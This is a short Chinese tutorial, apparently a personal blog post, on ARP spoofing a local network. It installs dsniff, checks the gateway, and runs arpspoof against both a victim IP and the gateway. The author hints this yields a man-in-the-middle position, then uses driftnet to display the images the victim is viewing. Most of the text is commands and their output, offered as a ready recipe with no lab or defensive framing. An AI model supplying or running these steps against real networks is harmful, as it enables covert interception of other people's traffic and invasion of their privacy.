某个叫魏然的小辣鸡看到这句话的时候留下个评论吧⊙▽⊙
1.在Ubuntu中安装Dsniff:要用到管理员权限
sudo apt-get install dsniff
2.欺骗之前先看一下网关
n@n-PC:~/Desktop$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.91.254 0.0.0.0 UG 0 0 0 ens33
10.1.91.0 0.0.0.0 255.255.255.0 U 0 0 0 ens33
3.第一条命令可以欺骗目标,第二条命令可以欺骗网关,两条一起的话,你懂吧?
arpspoof -i eth0 -t [被攻击ip] [网关ip]
arpspoof -i eth0 -t [网关ip] [被攻击ip]
例如下面这句就可以欺骗112:
sudo arpspoof -i ens33 -t 192.168.91.112 192.168.91.254
注意:eth0是自己的网卡名字,记得用ifconfig命令看一下,照抄易出错。ens33就是我的网卡名字,如下:
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet x.x.x.x netmask 255.255.255.0 broadcast 10.1.91.255
inet6 fe80::b47c:d57a:6eda:fca9 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:1a:ba:40 txqueuelen 1000 (Ethernet)
RX packets 10159 bytes 2503038 (2.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1022 bytes 175180 (171.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 20 bytes 1400 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1400 (1.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
4.还可以看攻击者浏览过什么图片,要安装一下driftnet
sudo apt-get install driftnet
在终端以管理员身份运行:
sudo driftnet
之后会弹出driftnet窗口,此时就可以在driftnet窗口中看到目标获取的图片。